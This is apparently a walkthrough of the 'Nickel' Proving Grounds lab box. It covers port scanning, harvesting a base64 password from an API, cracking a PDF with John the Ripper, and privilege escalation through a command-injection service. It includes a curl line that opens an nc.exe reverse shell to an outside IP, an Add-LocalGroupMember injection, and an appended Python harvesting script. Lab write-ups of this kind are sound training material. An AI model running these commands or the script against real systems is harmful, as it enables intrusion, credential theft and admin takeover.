WDavid404 / PG-Box

PG box walkthrough note

Nickel (Intermediate, Windows, 2020) #54

Open WDavid404 opened 3 months ago

WDavid404 commented 3 months ago

Keypoints:

WDavid404 commented 3 months ago
PORT      STATE    SERVICE       REASON          VERSION
21/tcp    open     ftp           syn-ack ttl 125 FileZilla ftpd
22/tcp    open     ssh           syn-ack ttl 125 OpenSSH for_Windows_8.1 (protocol 2.0)

80/tcp    open     tcpwrapped    syn-ack ttl 125

135/tcp   open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open     netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds? syn-ack ttl 125

3389/tcp  open     ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| ssl-cert: Subject: commonName=nickel
| Issuer: commonName=nickel
5040/tcp  open     unknown       syn-ack ttl 125

8089/tcp  open     http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-favicon: Unknown favicon MD5: 9D1EAD73E678FA2F51A70A933B0BF017
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Supported Methods: GET

33333/tcp open     http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-favicon: Unknown favicon MD5: 76C5844B4ABE20F72AA23CBE15B2494E
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Supported Methods: GET POST

49664/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open     msrpc         syn-ack ttl 125 Microsoft Windows RPC

--> sudo sh -c 'echo "192.168.170.99 nickel" >> /etc/hosts'

21/tcp

Anonymous login to FTP --> failed

139/tcp, 445/tcp

enum4linux --> no info
smbmap --> no info

80/tcp

cannot access

33333/tcp

[image]

8089/tcp

[image] Click those buttons --> no response. See the source code of the page: [image]

Change IP address

curl -X GET http://nickel:33333/list-active-nodes
curl -X GET http://nickel:33333/list-running-procs
curl -X GET http://nickel:33333/list-current-deployments

--> [image] Cannot "GET"... How about POST? --> Need to have a content length [image]

Add "Content-Length: 100" to the header --> got interesting info [image]: ariah:NowiseSloopTheory139 (because echo Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 -d --> NowiseSloopTheory139)

ssh ariah@192.168.170.99 --> succeed!

PE

whoami /priv --> no useful info

ls C:/ [image]

Go to C:/ftp [image]. Download this file (we can log in to FTP and download it). Open it --> requires a password [image]

pdf2john Infrastructure.pdf > pdf.hash
john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 pdf.hash

-->ariah4168

Open the PDF again [image]

After enumeration, [image] try curl -v 127.0.0.1:80 [image]

Set up a tunnel with ligolo-ng, and try curl -v 240.0.0.1:80/?whoami [image]

curl http://240.0.0.1:80/?C:\\Users\\ariah\\Downloads\\nc.exe%20-e%20cmd.exe%20192.168.45.205%20443 --> Got a reverse shell [image]

Another method for PE:

Add-LocalGroupMember -Group Administrators -Member ariah --> URL encode:
curl 'http://240.0.0.1:80/?Add-LocalGroupMember%20-Group%20Administrators%20-Member%20ariah' [image]

SSH again [image]
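The two steps the note relies on (a POST to the port 33333 API that only answers when a Content-Length header is present, then spotting the base64 password inside the returned process list, and later URL-encoding a command for the localhost:80 service) scripted as an added example. This is not code from the note or the box; the endpoint paths, the 240.0.0.1 ligolo address and the decoded credential come from the note, while the process list below is constructed for the offline check and the Content-Length value of 0 (rather than the 100 used in the note) is an assumption that a well-formed empty POST is accepted.

```python
#!/usr/bin/env python3
"""Added example: POST the Nickel-style API with an explicit Content-Length,
scan the response for base64 tokens that decode to readable text, and build
a URL-encoded command for the GET-based command runner on localhost:80."""
import base64
import binascii
import http.client
import re
import string
from typing import List, Tuple
from urllib.parse import quote

# Endpoint paths taken from the note (the server on port 33333 refuses GET).
ENDPOINTS = ["/list-active-nodes", "/list-running-procs", "/list-current-deployments"]

# A run of 16+ base64 alphabet characters with optional padding, bounded so we
# do not cut a longer token in half. Length and padding are validated on decode.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")

# Constructed sample of what a process list could look like; only the
# credential token matches the note. Not captured from the box.
SAMPLE_PROCS = (
    '"C:\\Windows\\System32\\svchost.exe" -k netsvcs\n'
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '-ExecutionPolicy Bypass -File C:\\temp\\backup.ps1 -u ariah -p Tm93aXNlU2xvb3BUaGVvcnkxMzkK\n'
    '"C:\\Program Files\\FileZilla Server\\FileZilla Server.exe"\n'
)


def post_with_length(host: str, port: int, path: str, timeout: float = 10.0) -> str:
    """POST with an empty body and an explicit Content-Length header.
    Assumption: the endpoint rejects GET and a POST lacking Content-Length;
    Content-Length: 0 is the well-formed way to send an empty POST."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("POST", path, body=b"", headers={"Content-Length": "0"})
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return body


def extract_base64_secrets(text: str) -> List[Tuple[str, str]]:
    """Return (token, decoded) for every base64 token in `text` whose decoding
    is printable text. Invalid base64 and binary payloads are skipped, so
    ordinary path components or long words do not produce false hits."""
    found: List[Tuple[str, str]] = []
    for match in B64_TOKEN.finditer(text):
        token = match.group(0)
        try:
            raw = base64.b64decode(token, validate=True)
            decoded = raw.decode("utf-8")
        except (binascii.Error, ValueError):
            continue  # wrong length/padding or not UTF-8: not a text secret
        if decoded and all(c in string.printable for c in decoded):
            found.append((token, decoded.strip()))
    return found


def injection_url(cmd: str, host: str = "240.0.0.1", port: int = 80) -> str:
    """Build the GET URL for the command runner the note found on port 80
    (reached through the ligolo-ng tunnel as 240.0.0.1). Every reserved
    character in the command is percent-encoded so the shell and HTTP parser
    both see one argument."""
    return f"http://{host}:{port}/?{quote(cmd, safe='')}"


def harvest(host: str, port: int = 33333) -> List[Tuple[str, str, str]]:
    """Query every endpoint and return (endpoint, token, decoded) triples."""
    results = []
    for path in ENDPOINTS:
        body = post_with_length(host, port, path)
        for token, decoded in extract_base64_secrets(body):
            results.append((path, token, decoded))
    return results


if __name__ == "__main__":
    # Offline demonstration on the constructed sample.
    for token, decoded in extract_base64_secrets(SAMPLE_PROCS):
        print(f"{token} -> {decoded}")
    print(injection_url("Add-LocalGroupMember -Group Administrators -Member ariah"))
    # Live use (requires the /etc/hosts entry from the note):
    # for path, token, decoded in harvest("nickel"): print(path, token, decoded)
```

The regex only proposes candidates; `b64decode(..., validate=True)` rejects anything with a bad length or stray characters, and the UTF-8 plus printable checks drop tokens that are merely long alphanumeric words. Running `harvest()` against a real host is the network path and is deliberately kept out of the offline demonstration.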